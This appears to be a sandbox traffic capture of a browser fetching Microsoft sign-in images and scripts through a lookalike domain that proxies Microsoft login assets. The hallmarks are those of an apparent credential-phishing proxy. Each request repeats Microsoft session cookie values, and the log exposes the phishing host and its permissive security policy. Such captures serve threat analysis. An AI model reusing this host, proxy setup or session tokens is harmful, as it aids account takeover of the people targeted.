2024-04-26 11:21:35 UTC	1534	IN	Data Raw: 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:36 UTC	1710	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:37 UTC	779	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:37 GMT Content-Type: image/svg+xml Content-Length: 621 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT ETag: 0x8D8852A7FA6B761 x-ms-request-id: 973f287f-201e-0064-63cb-970bb4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112136Z-17859dc676bbnmlth8zvr2wnun000000040g000000020n4r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 11:21:37 UTC	621	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=\|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:36 UTC	2770	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_76bb127b5869a5c6b8b3.js HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:37 UTC	1386	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:36 GMT Content-Type: application/x-javascript content-length: 113440 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 26 Jan 2023 00:32:56 GMT ETag: 0x8DAFF34DE8E0647 x-ms-request-id: 62e8d734-c01e-003e-32cb-976692000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112136Z-17949d75874jndg88neeqm4ty80000000atg000000000ne2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:37 UTC	14998	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 79 7f db 38 b2 28 fa ff fd 14 b6 a6 c7 11 db b4 2c 6a 97 6d c6 e3 78 e9 64 a6 bb 93 93 a5 e7 cc c8 ea 0c 45 41 12 db 14 29 93 94 97 c4 9e cf fe aa 0a 3b 29 67 39 e7 9e 7b df ef bd cc 34 4d 14 0a 85 42 01 28 14 0a 05 6a ff c7 ed ff b5 f5 e3 d6 de b7 ff db 7a f7 fe e4 ed fb ad d7 17 5b ef 5f be 7a 7b b6 f5 06 52 ff d8 fa f5 f5 fb 57 a7 e7 df 4e 07 2b c5 ff de 2f a2 7c 6b 16 c5 6c 0b fe 4e 82 9c 4d b7 d2 64 2b cd b6 a2 24 4c b3 55 9a 05 05 cb b7 96 f0 cc a2 20 de 9a 65 e9 72 ab 58 b0 ad 55 96 fe c1 c2 22 df 8a a3 bc 80 42 13 16 a7 b7 5b 75 20 97 4d b7 de 04 59 71 bf f5 ea 8d d3 00 fa 0c a8 45 f3 28 81 d2 61 ba ba 87 f7 45 b1 95 a4 45 14 b2 ad 20 99 12 b5 18 12 49 ce b6 d6 c9 94 65 5b b7 8b 28 5c 6c fd 12 85 59 9a a7 b3 62 Data Ascii: y8(,jmxdEA);)g9{4MB(jz[_z{RWN+/\|klNMd+$LU erXU"B[u MYqE(aEE Ie[(\lYb
2024-04-26 11:21:37 UTC	1386	IN	Data Raw: 8c 18 4b 2e 7f 23 4f c5 54 f2 9e c4 9c ea 45 a8 8e 99 55 be 9f 14 ca cc 0d 17 9b 86 32 af 72 6f 69 a8 da 5c be 9d d4 33 32 c4 ec 08 5a 06 cc 16 9d 6a 6b f5 82 52 a8 0a 6d 38 20 2c e7 49 7b a8 5d ce b0 ee 28 a9 ae d8 70 49 89 be 80 21 32 2b 6c 86 3a af d2 bf 9d 72 9e d4 56 4c 66 54 8a b4 ed 1c bb 0b e5 e7 23 f9 bd 9b 0c 2f b6 97 be 90 47 6a d0 bc 16 42 1d 1c 1b 41 e5 d4 a9 b1 0a 21 27 fd 52 b9 a9 e1 29 a8 05 49 8c 9f 1a a1 b5 c5 bc 46 31 e5 00 7d 8d 82 63 18 d7 28 48 d3 9b 57 01 7a 1c 50 32 06 49 04 86 31 c8 09 9b 97 00 38 65 cb 4b 42 fd 87 bb 32 eb 13 13 43 3a cd cf 78 95 8e 78 55 de 46 ba d2 97 ad ec 93 3c b2 47 cc 50 7d 9a fe d5 4b 7f 34 3c ad 50 7b ea 93 8a 31 4a fa c1 08 b5 e7 e5 d4 ba 45 5a d2 4e 66 3c 70 7e cc 5f f5 22 38 94 80 cc 82 58 21 ec d4 bb Data Ascii: K.#OTEU2roi\32ZjkRm8 ,I{](pI!2+l:rVLfT#/GjBA!'R)IF1}c(HWzP2I18eKB2C:xxUF<GP}K4<P{1JEZNf<p~_"8X!
2024-04-26 11:21:37 UTC	7698	IN	Data Raw: f7 32 26 6a ea 49 d8 8d 0d 89 c2 2b fb b6 e8 40 82 4b 06 7d e5 de 61 77 76 29 3f 4e 5c b9 54 38 e4 44 8c 9f 2e e1 90 2b 1d ca c8 eb a9 d4 f2 f2 f5 db 5f f9 08 61 84 20 7e 13 e9 8e 1c 45 45 f9 f7 ec 4c e5 da 56 00 2b 1c bc 2d a1 95 40 f1 ae cc b1 a2 c4 89 2f f4 8d 28 83 39 e0 dd 45 30 81 45 db 11 e5 41 b9 23 f5 41 49 f5 81 4b 8e 60 7f ce b5 48 99 3c d0 a0 9d 62 91 ae 26 72 3c b5 69 f3 0a 10 e3 5a b7 c7 21 b2 4e ea f8 8a 71 3e e1 48 25 e3 bc 2b a0 2a f0 23 20 6f 60 91 e6 8a 03 ea 11 eb d0 9c c6 60 16 48 59 f0 af f2 bf 7f 7b 72 76 6e 02 0a cb 65 da 25 d7 90 84 69 57 33 ff 3d a8 6a b4 2d ff f2 c1 c6 60 db 49 c7 c8 51 ce ca d0 00 1a 01 b8 dc 47 b5 39 fe 56 b2 a4 26 6b 97 09 2a ac 44 d5 d8 c9 05 e4 9a 7b 9f 45 2b e3 b7 9e c5 2c 47 a0 c6 13 15 e7 6a ff 34 e5 80 Data Ascii: 2&jI+@K}awv)?N\T8D.+_a ~EELV+-@/(9E0EA#AIK`H<b&r<iZ!Nq>H%+# o``HY{rvne%iW3=j-`IQG9V&kD{E+,Gj4
2024-04-26 11:21:37 UTC	8686	IN	Data Raw: a7 bd 6f 6d 6e db 58 16 fc be bf 42 62 6c 19 30 40 f1 a1 87 23 92 20 a3 6b 3b bb ae ca b9 71 25 b9 f7 c3 21 69 1e 90 04 49 44 20 c0 00 a4 1e 16 b8 bf 7d bb 7b de 00 28 c9 3e f7 d4 dd da da 54 2c 02 83 79 f6 f4 f4 f4 f4 f4 43 5d 10 64 db 87 88 3c 72 06 f7 db ba 1f 85 cb b8 53 73 30 db 78 6c 8c f1 c0 cd aa b6 0e dc b5 71 a7 6a f4 42 48 fd b1 1b 28 1e 60 97 6b da 08 65 86 94 32 b8 45 68 a9 0a 08 5c ec a0 06 44 b6 bb c2 ad fd d8 3a 44 57 bb 2b 21 11 c2 b3 33 42 cb dd 78 0f 12 5a bd 0d 41 0c cf ce 30 10 40 fa 15 b2 19 30 c0 c7 f7 86 92 fb 7b ae 90 4c ab 9f 2d 8f 95 5c 1e ea db 13 94 9b e5 c1 8e fc 57 2e 86 15 ee 75 4e 1b ef 3c 34 88 4d 93 f9 83 9c 78 7c 51 68 33 05 c4 71 da 80 90 f6 0b 50 6c e5 ae 14 8a cd 8b b8 a5 50 78 fe af c3 ad 81 86 60 a8 69 7a 10 c7 34 Data Ascii: omnXBbl0@# k;q%!iID }{(>T,yC]d<rSs0xlqjBH(`ke2Eh\D:DW+!3BxZA0@0{L-\W.uN<4Mx\|Qh3qPlPx`iz4
2024-04-26 11:21:37 UTC	3024	IN	Data Raw: 8d c1 54 40 2b 36 a1 05 40 d0 cf 11 6c fc 31 ef 4c ac 8d 3f d4 52 9b df 02 15 48 f1 b8 e9 b7 4c 3b 39 09 fb 15 50 a8 04 a0 18 d6 cb e0 18 da 45 ca 0a a3 37 29 83 d8 cd 0f d1 19 b5 e1 8b a5 5c a6 2c 62 35 96 ae 02 cc 05 a2 33 3f e6 76 3a 1e 3c 9f 45 f2 89 50 39 bb 16 b2 3b 85 b1 d0 4c 96 af f4 bc 26 45 ae ee 96 20 21 11 c7 a0 81 9e 87 4e a2 b9 a2 1d 43 0c 8c 5e e0 6e bd aa 49 d2 cc a7 b6 03 25 ce e9 04 5d 49 ac 30 1a b5 5d ae 2f 06 1c e2 d9 2b ea 75 b7 4e 55 7b 4a 4c c4 70 6e 90 b2 73 97 39 27 78 72 ae de a8 b9 f0 38 cc d8 75 19 9c 47 82 0e 6c 43 28 f4 36 f7 3f e3 0d af 92 66 3e 4e 3e f0 6d e9 d6 aa e0 79 cd 19 0f f0 b0 38 dc d6 5b c4 e4 a6 c1 6d 90 12 db a4 ef 75 76 a7 d0 a4 80 9e 7d 70 eb 6d 9a 15 98 a3 ae 3a 2b 21 27 c9 16 0f a9 44 20 df c5 48 70 a3 81 Data Ascii: T@+6@l1L?RHL;9PE7)\,b53?v:<EP9;L&E !NC^nI%]I0]/+uNU{JLpns9'xr8uGlC(6?f>N>my8[muv}pm:+!'D Hp

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:36 UTC	1707	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:37 UTC	741	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:37 GMT Content-Type: image/png Content-Length: 5139 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Wed, 12 Feb 2020 03:12:12 GMT ETag: 0x8D7AF695A8C44DC x-ms-request-id: 44396d81-901e-005b-1bcb-97a3ba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112136Z-17859dc676bbc4229am71z2pc000000001cg000000022bun x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 11:21:37 UTC	5139	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 56 00 00 00 48 08 06 00 00 00 ad 04 dd dc 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 38 20 37 39 2e 31 36 34 30 33 36 2c 20 32 30 31 39 2f 30 38 2f 31 33 2d 30 31 3a 30 36 3a 35 37 20 20 Data Ascii: PNGIHDRVHtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:36 UTC	1696	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:37 UTC	744	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:36 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT ETag: 0x8D8731230C851A6 x-ms-request-id: 5b57c8ba-d01e-001b-2d62-9770ab000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112136Z-16f6b7d4654w58zs7tze3krwen000000054000000000k2s7 x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-26 11:21:37 UTC	15640	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 